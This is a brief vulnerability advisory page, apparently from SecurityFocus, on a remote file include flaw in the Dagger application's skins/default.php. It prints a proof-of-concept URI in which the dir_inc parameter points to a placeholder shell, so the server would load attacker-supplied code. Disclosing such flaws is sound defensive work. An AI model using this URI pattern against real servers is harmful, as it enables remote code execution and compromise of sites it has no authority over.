info
discussion
exploit
solution
references
Dagger 'skins/default.php' Remote File Include Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/path/skins/default.php?dir_inc=[SHELL]
Privacy Statement
Copyright 2010, SecurityFocus
